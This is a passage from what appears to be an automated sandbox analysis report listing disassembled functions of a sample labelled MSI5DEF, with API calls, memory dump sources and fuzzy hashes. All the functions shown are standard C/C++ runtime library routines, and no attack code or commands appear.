                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03AE2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03B02
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: a7a6367a453a9e5d01ad2291310d503631ae86e0bedad19672c5e675e8497945
                                                                        • Instruction ID: e97c1f1a8062e9e7a6ba8fafc62fb322e80a45423950f2b26b12f950dc560d37
                                                                        • Opcode Fuzzy Hash: a7a6367a453a9e5d01ad2291310d503631ae86e0bedad19672c5e675e8497945
                                                                        • Instruction Fuzzy Hash: 6801C03590061A9FCB11EBA4D94A6BE7BF5AF88710F240449F5156B2D2DF749F028B90
                                                                        Function 00AF7AF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7AFA
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B04
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7B55
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 9d290d19abbeb4c654d9526b56a3f7e467a1a6885f2432109a8a402f25c17a77
                                                                        • Instruction ID: fc61547d56807193e0254994cd77a4714cb6170be00c93547093ee029f9bebe5
                                                                        • Opcode Fuzzy Hash: 9d290d19abbeb4c654d9526b56a3f7e467a1a6885f2432109a8a402f25c17a77
                                                                        • Instruction Fuzzy Hash: B301D23690461D8BCB01EBE4C945ABE7BB1AF85310F240509F611AB2D2CF349F02CBD0
                                                                        Function 00AF7A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7A65
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7A6F
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7AC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7AE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 1474cefa92e3d1b3a0299df234492d6fde2f1e3e0bf90c53e6f95834b7b6a149
                                                                        • Instruction ID: 4ec8159a847aaf8e687b5533850a265961145e646d072b7147ff46744088b540
                                                                        • Opcode Fuzzy Hash: 1474cefa92e3d1b3a0299df234492d6fde2f1e3e0bf90c53e6f95834b7b6a149
                                                                        • Instruction Fuzzy Hash: A201C03590461D9BCB01FBA4C9456BE7BA1AF84320F250009F6206B2D2DF349F018BD1
                                                                        Function 00AF7B88 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7B8F
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7B99
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7BEA
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7C0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 98285f84a94aa854a16c536f6623c73dbdc4c747b8438af0c83318aba46b9668
                                                                        • Instruction ID: f80ed543b16513881ff1da5929f48ecc9c928e29a81672037114259a76837736
                                                                        • Opcode Fuzzy Hash: 98285f84a94aa854a16c536f6623c73dbdc4c747b8438af0c83318aba46b9668
                                                                        • Instruction Fuzzy Hash: EA01C07690061D9BCB05EBA4D905ABE7BA1AF88320F240409F610AB292DF749F028B90
                                                                        Function 00B03CD4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03CDB
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03CE5
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03D36
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03D56
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 729ab4ca682c60ceb90f53b01d1d5486fc4cc716e50ce305f88e7544f7dc89e5
                                                                        • Instruction ID: 96644a7079df5915cd8e6f02e3135b40cbb0e7d189a526bc287ec434ec46cc06
                                                                        • Opcode Fuzzy Hash: 729ab4ca682c60ceb90f53b01d1d5486fc4cc716e50ce305f88e7544f7dc89e5
                                                                        • Instruction Fuzzy Hash: 1D01C0359006199FCB05EBA4D9497BE7BE5AF84710F240559F611AB2E2CF749F028B90
                                                                        Function 00B03C3F Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03C46
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03C50
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03CA1
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03CC1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 0a69e0d18cb599ce4150845d304c598470ab4282ff26c74df189ec06140c0446
                                                                        • Instruction ID: f5ab9de412f98d31c3608fd15a4d43d1c5f96277582f3bc8d78dcf5aa0c908b2
                                                                        • Opcode Fuzzy Hash: 0a69e0d18cb599ce4150845d304c598470ab4282ff26c74df189ec06140c0446
                                                                        • Instruction Fuzzy Hash: 7201C0769006199BCB11EBA4D9496BEBBF5EF88B10F240449F914AB3D1DF349F018B90
                                                                        Function 00AF7E71 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7E78
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7E82
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7ED3
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7EF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 98441e348e49a42575d134041b3bf06b2a4d8a1a8f0ec8588c101c88d6364325
                                                                        • Instruction ID: b512a35601596ccf945595318e755ada03fdf003546184d29f25882f404eb12f
                                                                        • Opcode Fuzzy Hash: 98441e348e49a42575d134041b3bf06b2a4d8a1a8f0ec8588c101c88d6364325
                                                                        • Instruction Fuzzy Hash: 3501923590561D9FCB05EBE4DA467BE7BB1AF84310F240449F6106B3D2DF349E028B91
                                                                        Function 00AF7F9B Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7FA2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7FAC
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7FFD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF801D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: a38d7d2b0ebe836f7ae3d413839264835ac023fd66617d40fb9b16423ad422ae
                                                                        • Instruction ID: ee757c37a58a6cf8a18d38f4a2cffd4da9dd02bbb217587227869f9cbab8acfe
                                                                        • Opcode Fuzzy Hash: a38d7d2b0ebe836f7ae3d413839264835ac023fd66617d40fb9b16423ad422ae
                                                                        • Instruction Fuzzy Hash: 3B01D23690061DDBCB01EBA4D9466BE7BB1AF84320F240009F610AB2D2DF349E02DB91
                                                                        Function 00AF7F06 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7F0D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7F17
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7F68
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7F88
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 453fe9fffe524bfab51cb4a97e1a1ea6ea1f3379a26014907737db42f052d50b
                                                                        • Instruction ID: 3420c2584241406ca276a169c7a2c844927d69ff6aeb6ccc12517df114fb78c0
                                                                        • Opcode Fuzzy Hash: 453fe9fffe524bfab51cb4a97e1a1ea6ea1f3379a26014907737db42f052d50b
                                                                        • Instruction Fuzzy Hash: D901C03690461D9BCB05EBE4C9456BE7BB1AF84310F244549F610AB2D2DF349E02CB90
                                                                        Function 00AF5C66 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF5C6D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF5C78
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5CE6
                                                                          • Part of subcall function 00AF5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00AF5DE0
                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00AF5C93
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                        • String ID:
                                                                        • API String ID: 677527491-0
                                                                        • Opcode ID: fa1b2a6f84f8a2e7e04d4612b91915f6d03bab1ef37adff77b8c60280febbc46
                                                                        • Instruction ID: c80b56c9780837fb6e3d9b370403b9e3e52b503d4601647097526353719e3661
                                                                        • Opcode Fuzzy Hash: fa1b2a6f84f8a2e7e04d4612b91915f6d03bab1ef37adff77b8c60280febbc46
                                                                        • Instruction Fuzzy Hash: C301BC75A01A648BCB06EBB0D905A7D7BA1BF8A740B140049FA1217382CF74AE03CBC1
                                                                        Function 00B28C76 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000), ref: 00B28C8D
                                                                        • GetLastError.KERNEL32(?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000,?,?,?,00B27D0F,?), ref: 00B28C99
                                                                          • Part of subcall function 00B28C5F: CloseHandle.KERNEL32(FFFFFFFE,00B28CA9,?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000,?,?), ref: 00B28C6F
                                                                        • ___initconout.LIBCMT ref: 00B28CA9
                                                                          • Part of subcall function 00B28C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B28C50,00B28630,?,?,00B27788,?,?,00000000,?), ref: 00B28C34
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B28643,?,00000001,?,?,?,00B27788,?,?,00000000,?), ref: 00B28CBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 0ed7aa89d2019f6572c0f746f2831f6e26dab9b0464c53e75215367695836f3a
                                                                        • Instruction ID: cc7fa5f9efe5e4efecd6d47a7cfa0771a40190868f6e1cc2f18baf39001ac2f3
                                                                        • Opcode Fuzzy Hash: 0ed7aa89d2019f6572c0f746f2831f6e26dab9b0464c53e75215367695836f3a
                                                                        • Instruction Fuzzy Hash: 3AF01C36012165BBCF222F95EC04D8A3FA6FF097A1F144450FA1996231DF32C921EBA0
                                                                        Function 00B078FD Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,00B0789A,00000064), ref: 00B07920
                                                                        • LeaveCriticalSection.KERNEL32(00B44AF8,?,?,00B0789A,00000064,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B0792A
                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00B0789A,00000064,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B0793B
                                                                        • EnterCriticalSection.KERNEL32(00B44AF8,?,00B0789A,00000064,?,?,00AE25B6,00B4571C,1816BA6E,?,00000000,00B293ED,000000FF,?,00AE1A26), ref: 00B07942
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: 848fe3f9f7d43252eb0eff2a69a1f505a092a44415bc87bf784ef01d32d2ff72
                                                                        • Instruction ID: 5057a38e5f62b7972504866da6cff18ecfdfdaa000780cac000c937e2ea7b559
                                                                        • Opcode Fuzzy Hash: 848fe3f9f7d43252eb0eff2a69a1f505a092a44415bc87bf784ef01d32d2ff72
                                                                        • Instruction Fuzzy Hash: CEE09236AC5624FBC7212B50EC09F9D7F54EB09751B114091F50563170CFA05A229BD9
                                                                        Function 00B1709D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B1712D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: dd69b4d104c03ca14c6baa695823bddba584f8adc77a39efc5570e74f41ec4a7
                                                                        • Instruction ID: 8b92d9bdffa6f872e2bdccb5fd3f7b941f4557a9175e7af62b2f7f16c2c6e4aa
                                                                        • Opcode Fuzzy Hash: dd69b4d104c03ca14c6baa695823bddba584f8adc77a39efc5570e74f41ec4a7
                                                                        • Instruction Fuzzy Hash: 79514761A5C207A6CB157724C9413FE6BF0EB81740FF089F9F495532A9EE34C8D5DA82
                                                                        Function 00B06C34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldiv
                                                                        • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                        • API String ID: 3732870572-1956417402
                                                                        • Opcode ID: 229e32d245a78933840f458b07cd172d628725e143e3858362ecf2d83f4e7a82
                                                                        • Instruction ID: 78a0b2c930691dcebfea9663ac75e47534a62ee333a4da22c7576cabc0a04d9a
                                                                        • Opcode Fuzzy Hash: 229e32d245a78933840f458b07cd172d628725e143e3858362ecf2d83f4e7a82
                                                                        • Instruction Fuzzy Hash: DB51C170B042995AEF359F6D88917BEBFF6EF45310F1441EAE4D1D72C1C27489528B50
                                                                        Function 00AEF860 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AEFA3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID: false$true
                                                                        • API String ID: 118556049-2658103896
                                                                        • Opcode ID: 686695fd1856c14db1de8d03a5b7d2436b57d48f2d96f83ed5d28281b0cf3b26
                                                                        • Instruction ID: 176ad13c620d8efac59c1bd7e70ba98cfb8ca255f9caf0a8a0ff653277598216
                                                                        • Opcode Fuzzy Hash: 686695fd1856c14db1de8d03a5b7d2436b57d48f2d96f83ed5d28281b0cf3b26
                                                                        • Instruction Fuzzy Hash: 7051B3B1D003489FDB10DFA4C941BEEBBF8FF45304F14826AE945AB281E775AA45CB91
                                                                        Function 00B022AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00B022B1
                                                                        • _swprintf.LIBCMT ref: 00B02329
                                                                          • Part of subcall function 00AF780A: __EH_prolog3.LIBCMT ref: 00AF7811
